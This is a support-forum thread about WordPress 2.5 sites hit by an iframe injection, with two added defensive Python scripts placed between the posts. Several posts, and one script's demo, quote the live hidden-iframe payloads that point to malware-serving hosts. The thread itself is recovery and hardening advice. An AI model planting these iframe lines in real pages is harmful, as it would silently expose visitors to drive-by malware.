
WordPress 2.5 Hacked (31 posts)

  1. muskogeerabbit
    Member
    Posted 6 years ago #

    I recently upgraded to 2.5 and this morning had my site hacked redirecting all readers to cdpuvhfzz.com. I am now trying to figure out the easiest way to recover. Any suggestions would be appreciated.

    Don Ray
    [sig moderated]

  2. sabinou
    Member
    Posted 6 years ago #

    Don, the easiest way to redirect stuff is to edit your .htaccess file : has it been modified ?
    Next, you can use a program like flashget to download the supposed entry page of your blog, see if it downloads something containing an iframe.
    Next, download all html files to your harddisk and search the string cdpuvhfzz to see if it may be present in one of your hacked files.

    And of course, change all your passwords, don't note them in places easy to see, etcetera...

  3. muskogeerabbit
    Member
    Posted 6 years ago #

    Hi Sabinou. I will try what you suggest. My .htaccess has not been touched, but I don't think my host uses that any more. I remember they made a change to avoid using .htaccess.

  4. JHouse
    Member
    Posted 6 years ago #

    If all else fails, ask your host to restore your site to the earliest backup. This, however, may pose a problem if you added a bunch of stuff to your site within the last couple days, yet their most recent backup is from last week.

    Good luck.

  5. muskogeerabbit
    Member
    Posted 6 years ago #

    Can anyone tell me if it is normal for the index.php module, in wp-content, to contain an iframe statement when a site is up and running? I know it doesn't in the initial library. In other words, does WordPress use iframe itself?

  6. muskogeerabbit
    Member
    Posted 6 years ago #

    As with my question above, would the same iframe statement be in wp-config.php?

  7. lomes
    Member
    Posted 6 years ago #

    The actual PHP file wp-content/index.php looks to simply be there to disallow directory browsing. The contents of this file (at least in 2.5) is simply:

    <?php
    // Silence is golden.
    ?>

    So there should be nothing else in that file...

    When I actually browse there in a web browser, it outputs the following HTML:

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
    <HTML><HEAD>
    <META http-equiv=Content-Type content="text/html; charset=windows-1252"></HEAD>
    <BODY></BODY></HTML>

  8. lomes
    Member
    Posted 6 years ago #

    No. It sounds like someone has been playing with your files...

  9. lomes
    Member
    Posted 6 years ago #

    If you haven't done much customization (or even if you have), you might want to download the version of the files on your webhost to your local machine. Then compare them to the local copy you had actually uploaded to the web host (you do have that right?). If you don't, you can just download the WP2.5 zip again and extract it somewhere to compare.

    I'd suggest using something like http://winmerge.org/ (free) and just do a full directory compare. Then you'll know if and what files have been changed from what WP delivers. If YOU didn't make those changes... well there ya go.

  10. muskogeerabbit
    Member
    Posted 6 years ago #

    I have the original files for WP 2.5 and uploaded them to my host site. However, these two files are requested to be left alone during an upgrade and that is why I am asking the question.

    I downloaded these from my host to see what they looked like and both contained something like the following:

    <iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe>'; ?><?php echo '<iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe>'; ?>

  11. muskogeerabbit
    Member
    Posted 6 years ago #

    Aha. That displays different in the post than what it looked like. That is the problem!

  12. vieraman
    Member
    Posted 6 years ago #

    I just had this happen to my website and it's horrible. My sites are hosted at godaddy.com and this happened before but the redirect was something as ugly. I called godaddy about this and simply put it off spending no time at all to research this problem. I ended up having to shut down 7 websites that were all experiencing the hacked code. It was some kind of trojan that collected data. I had thought the bad hack came from a malicious russian programmer..hmm but i don't know still what the problem is. i have godaddy studying this problem again. we'll see how great the security team is over there and will keep everyone posted as to what the heck this thing actually is...

  13. Galeth
    Member
    Posted 6 years ago #

    Two days ago my web suffered the same attack; I'm praying not to receive any other...

    Is there any solution?

  14. bobsie
    Member
    Posted 6 years ago #

    Experienced a similar problem.

    Four different WordPress installations all on the same web space have been infected. Php files contain inserted malicious code in the form of an iframe. Perhaps other insertions as well?

    The result is that various bits of functionality no longer work in the WordPress CMS, for example text editor tool bars, upload bar, etc. One of the WordPress sites isn't even viewable from the front anymore!
    Desperately in need of a plugin that will rip out the malicious code?!
    Otherwise I'm going to have to download all the websites, strip out the malicious code by hand -- which will take about eight years -- then upload them again! (My web host doesn't have backups of the files.)
    Can anyone help? A plugin? A script to replace the malicious code inserted in the name of cdpuvbhfzz.com?

    cdpuvbhfzz.com or whoever wrote this hack - you are the scum of the earth.

  15. greyko
    Member
    Posted 6 years ago #

    I stumbled across this on my website after I found google was saying my site may harm my computer.
    My internet is a bit slow at the moment so got a friend to have a poke around and she found a virus being blocked from the above site. She only had this happen in IE though?
    It gave me something to search on anyhow, and I came across this thread.

    I ditched wordpress hoping that would fix it, but I found it had infected every php and html document on my website. I noticed that they had a different date to the rest of the files, so once I had that date I could track the infected files.
    I wiped my coppermine gallery (too much to try to fix) and replaced all the html files with those on my hard drive.
    Not sure if it's fixed the problem, might have to start fresh.
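Several posters above describe the same three manual checks: search every file for the injected string (sabinou), compare the deployed tree against a clean copy of the same WordPress release (lomes), and use the modification date of the infected files to find the rest (greyko). The script below is an added example, not code from this thread or from WordPress, that automates those checks with the standard library. The marker patterns are the ones quoted in the posts (the hidden 1x1 iframe, the cdpuvbhfzz.com domain and wp-stats.php); the sample site tree it builds is constructed for the demonstration.

```python
"""Triage helper for an injected-iframe compromise (added example, not from the thread).

Three checks the posters did by hand: grep for the injection marker, diff the live
tree against a pristine release, and list files modified after a cut-off.
"""
import hashlib
import os
import re
import tempfile
import time
from pathlib import Path

# Markers quoted in the thread: a 1x1 iframe, the redirect domain, the wp-stats iframe.
INJECTION_PATTERNS = [
    re.compile(rb"<iframe[^>]*width=1[^>]*height=1", re.I),
    re.compile(rb"cdpuvb?hfzz\.com", re.I),
    re.compile(rb"wp-stats\.php", re.I),
]
SCAN_SUFFIXES = {".php", ".html", ".htm", ".js"}


def sha256_of(path):
    """Streaming SHA-256 of a file so large uploads don't get read into memory."""
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def find_injected(site):
    """Relative paths of web files whose content matches an injection marker."""
    hits = []
    for p in site.rglob("*"):
        if p.is_file() and p.suffix.lower() in SCAN_SUFFIXES:
            if any(pat.search(p.read_bytes()) for pat in INJECTION_PATTERNS):
                hits.append(p.relative_to(site).as_posix())
    return sorted(hits)


def diff_against_clean(site, clean):
    """Compare the live tree with a pristine release: changed, extra and missing files.

    'extra' is the list mccormicky asks for: files you did not upload yourself.
    """
    live = {p.relative_to(site).as_posix(): p for p in site.rglob("*") if p.is_file()}
    ref = {p.relative_to(clean).as_posix(): p for p in clean.rglob("*") if p.is_file()}
    changed = [r for r in sorted(live) if r in ref and sha256_of(live[r]) != sha256_of(ref[r])]
    return {
        "changed": changed,
        "extra": sorted(set(live) - set(ref)),
        "missing": sorted(set(ref) - set(live)),
    }


def modified_within_days(site, days):
    """Files whose mtime is newer than `days` ago; the pivot greyko used."""
    cutoff = time.time() - days * 86400
    return sorted(p.relative_to(site).as_posix()
                  for p in site.rglob("*") if p.is_file() and p.stat().st_mtime > cutoff)


def build_demo():
    """Construct a clean release tree and a compromised copy (sample data, not real files)."""
    root = Path(tempfile.mkdtemp(prefix="wp-triage-"))
    clean, site = root / "clean", root / "site"
    files = {
        "wp-content/index.php": b"<?php\n// Silence is golden.\n?>\n",
        "wp-config.php": b"<?php\ndefine('DB_NAME', 'example');\n",
        "wp-content/themes/default/footer.php": b"<?php wp_footer(); ?>\n</body></html>\n",
    }
    for rel, body in files.items():
        for base in (clean, site):
            f = base / rel
            f.parent.mkdir(parents=True, exist_ok=True)
            f.write_bytes(body)
    old = time.time() - 30 * 86400          # pretend the site was deployed a month ago
    for p in site.rglob("*"):
        if p.is_file():
            os.utime(p, (old, old))
    # Simulate the compromise: the iframe appended to two files, plus one dropped file.
    injected = (b"<?php echo '<iframe src=\"http://cdpuvbhfzz.com/dl/adv598.php\""
                b" width=1 height=1></iframe>'; ?>\n")
    (site / "wp-config.php").write_bytes(files["wp-config.php"] + injected)
    (site / "wp-content/index.php").write_bytes(files["wp-content/index.php"] + injected)
    dropped = site / "wp-content/uploads/x.php"
    dropped.parent.mkdir(parents=True, exist_ok=True)
    dropped.write_bytes(b"<?php /* file that is not part of the release */ ?>\n")
    return clean, site


if __name__ == "__main__":
    clean_dir, site_dir = build_demo()
    print("injected:", find_injected(site_dir))
    print("diff:", diff_against_clean(site_dir, clean_dir))
    print("recent:", modified_within_days(site_dir, 1))
```

On a real incident point `site` at a download of the live web root and `clean` at the unzipped release of the same version; anything in `changed` or `extra` that you did not put there yourself is what needs removing or replacing, and `modified_within_days` gives the date pivot for finding files the marker search missed.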

  16. Samuel Wood (Otto)
    Tech Ninja
    Posted 6 years ago #

    A lot of the time, these hacks are the result of bad permissions on files, allowing other users on the shared servers to write to them.

    Remember, you're sharing a system with 60-80 other sites. If any of them gets hacked, you can be attacked through there as well.

    Permissions are important. Read more on how to harden your setup here:
    http://codex.wordpress.org/Hardening_WordPress
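Otto's point is that on a shared host a file that is writable by "other" can be modified by any neighbouring account on the same server. The script below is an added example, not code from the thread or from WordPress, that audits a web root for world-writable files and directories and for anything that deviates from the common 644 (files) / 755 (directories) baseline, and can optionally reset them; it assumes that baseline (many hosts tighten wp-config.php further) and builds a constructed sample tree for the demonstration.

```python
"""Permission audit for a web root on shared hosting (added example, not from the thread)."""
import os
import stat
import tempfile
from pathlib import Path

# Assumed baseline: files 644, directories 755 (wp-config.php is often set tighter).
FILE_MODE = 0o644
DIR_MODE = 0o755


def audit_permissions(root):
    """Return world-writable entries and entries whose mode differs from the baseline."""
    world_writable, nonstandard = [], []
    for p in root.rglob("*"):
        if p.is_symlink():
            continue                      # judge the target, not the link
        mode = stat.S_IMODE(p.stat().st_mode)
        rel = p.relative_to(root).as_posix()
        if mode & stat.S_IWOTH:           # any other local user can write here
            world_writable.append(rel)
        expected = DIR_MODE if p.is_dir() else FILE_MODE
        if mode != expected:
            nonstandard.append((rel, oct(mode)))
    return {"world_writable": sorted(world_writable), "nonstandard": sorted(nonstandard)}


def fix_permissions(root, dry_run=False):
    """Reset every entry to the baseline; returns the relative paths that were (or would be) changed."""
    changed = []
    for p in root.rglob("*"):
        if p.is_symlink():
            continue
        expected = DIR_MODE if p.is_dir() else FILE_MODE
        if stat.S_IMODE(p.stat().st_mode) != expected:
            changed.append(p.relative_to(root).as_posix())
            if not dry_run:
                os.chmod(p, expected)
    return sorted(changed)


def build_demo_tree():
    """Construct a small web root with two deliberately loose entries (sample data)."""
    root = Path(tempfile.mkdtemp(prefix="wp-perms-"))
    (root / "wp-content/uploads").mkdir(parents=True)
    (root / "wp-includes").mkdir()
    (root / "wp-config.php").write_text("<?php\n// sample config\n")
    (root / "wp-content/index.php").write_text("<?php\n// Silence is golden.\n?>\n")
    os.chmod(root / "wp-content", DIR_MODE)
    os.chmod(root / "wp-includes", DIR_MODE)
    os.chmod(root / "wp-content/index.php", FILE_MODE)
    os.chmod(root / "wp-content/uploads", 0o777)   # the classic "open upload dir" mistake
    os.chmod(root / "wp-config.php", 0o666)        # credentials readable and writable by everyone
    return root


if __name__ == "__main__":
    demo = build_demo_tree()
    print("before:", audit_permissions(demo))
    print("reset:", fix_permissions(demo))
    print("after:", audit_permissions(demo))
```

Run the audit first with `fix_permissions(root, dry_run=True)` to see what would change; an upload directory that genuinely must be writable by the web server should be handled by ownership or group membership rather than by making it world-writable.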

  17. theqkash
    Member
    Posted 6 years ago #

    Just remove the iframe code from the end of the file wp-config.php and the files of your templates. I have just done it.

  18. pamQ
    Member
    Posted 6 years ago #

    This has been traced at the Coppermine Photo Gallery forums as an exploit. See this link: http://forum.coppermine-gallery.net/index.php/topic,51671.0.html

    Do you have Coppermine installed on your websites? Or are you purely on WP?

    Our site has been hacked as well. I don't have access to the files, though. We'll have to wait until our webmaster gets on.

    And yes, the little iframes would redirect IE users to some trojans, I believe.

  19. ravetildon
    Member
    Posted 6 years ago #

    Appears I had something similar happen to mine:

    Thus put in an iframe in one of my pages:

    '<!-- Traffic Statistics --> <iframe
    src=http://61.155.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->'

    More details here:

    http://wordpress.org/support/topic/170138

  20. mccormicky
    Member
    Posted 6 years ago #

    @ravetildon, I had that exact iframe in a site using an older version of WP 2.2.1 or 2.2.2 which had a security error that allowed access to xmlrpc.php. The iframe code was in a page and a post--in this case a draft of a post---I deleted the codes but then came back to the site and found that the entire directory of wp-admin had been moved into the themes folder. I've since upgraded to 2.5.

    So check your directories for files and folders you didn't create.
    It's my opinion that the other folks in this thread who had this happen to WP 2.5 were hacked before they upgraded but just didn't notice so it looked like they were hacked even with version 2.5.
    Just a theory.
    @muskogeerabbit: if you don't use the default or classic themes in wp-content/ you can also delete wp-content/ and upload a fresh copy along with wp-admin/ and wp-includes/
    The only file you need to leave is config.php because that contains your database connection. Though you might want to paste in the line for the secret key because it isn't in older versions of WP config.php.

    I hope your site is healthy again!

  21. ravetildon
    Member
    Posted 6 years ago #

    My site did get hacked from the older version you mentioned. So I guess I missed the files...

  22. D4W50N
    Member
    Posted 6 years ago #

    They know the IP address of a person who is doing redirecting or hacking wordpress, what will happen to him? What will happen to the person of the IP 61.155.8.157 which is in Beijing, China?

  23. tmosprmo
    Member
    Posted 6 years ago #

    I got hacked too, apparently last night. have busy hi-profile site with 1000 visits per day. was on wp 2.5, which i had upgraded to a couple weeks ago. after hacking, just changed all passwords and deleted all old accounts. theme files i checked all appear okay, but hacker has made strange simple html file appear - with only one line that writes text referring to other website. only subset of wp database appears to have been hacked. main index file is still displaying correctly, but all 2000 posts appear in subdirectory which is now displaying hacker's text.

  24. tmosprmo
    Member
    Posted 6 years ago #

    hacker was ZoRRoKiN, message posted on our site was:

    ZoRRoKiN - Ottoman-Empire.OrG

  25. andy2mary
    Member
    Posted 6 years ago #

    I found the following code in three of my blog postings:

    <!-- Traffic Statistics --> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->

    I have deleted this code, blocked the subnet 61.155.8.xxx and changed my admin password.

  26. clivesgt
    Member
    Posted 6 years ago #

    hi
    i've been hacked a few times. i keep hoping that by updating to the latest version of wordpress will solve my problems but it doesn't. then i realised that the hacker had installed malicious code on my server after hacking my site, way back. all i was doing when i updated was updating the wordpress files but the malicious code was always still there so the hacker had an open door all the time, even though i had the latest version of wordpress running. i also realised that they had managed to somehow install code on my server which enabled them to send out spam email, some even using my email address as the sender! so beware, don't be fooled into thinking that by updating to the latest version of wordpress, that your site is secure. you can read about my experiences here

    regards

    clive

  27. Anonymous
    Unregistered
    Posted 6 years ago #

    The culprit is not word-press, it is the poster. I had this happen to me and it was a malware on the computer I used to post the item. I know because it appeared only on the post I made through that computer.

  28. simoncpage2
    Member
    Posted 6 years ago #

    damn it same happened to me - only one posting was affected and it was one I wrote last week and left as a draft till yesterday.

    Any idea exactly how this happens? Server vulnerability? Not convinced hack41 that it's to do with malware - I tried adding 2 test posts from both machines I would use to update the blog and neither came up with any malicious code.

    Since then I have removed unused plugins, made sure to update all the ones I was using, reset the password and user of the admin, turned off trackbacks and written to my hosting company to ask them what is going on. I will let you know what they say...if it is of interest.

    I suspect this is probably a permissions problem?...

  29. rawalex
    Member
    Posted 6 years ago #

    Here is something to look at: I suspect you will find that wordpress is not at fault, because wordpress never has issues like this! (yeah right).

    Meanwhile, check the following: Do you allow other users to make posts? Comments? Are you using the wordpress upload for images? Have you perhaps opened that directory up? Are you using a downloaded theme? Are any of your theme directories open (such that you could edit the files from the admin, example?).

    There are plenty of ways to insert that type of hack. For the most part, those are coming in via XMLRPC style edit attacks. If you are using 2.5 and not 2.5.1, you should upgrade.

  30. 5starunited
    Member
    Posted 5 years ago #

    I just finished updating my site and installed a couple of new plugins and now I get a redirect... I can no longer get to the admin screen to remove modules... Who moderates modules?

Topic Closed

This topic has been closed to new replies.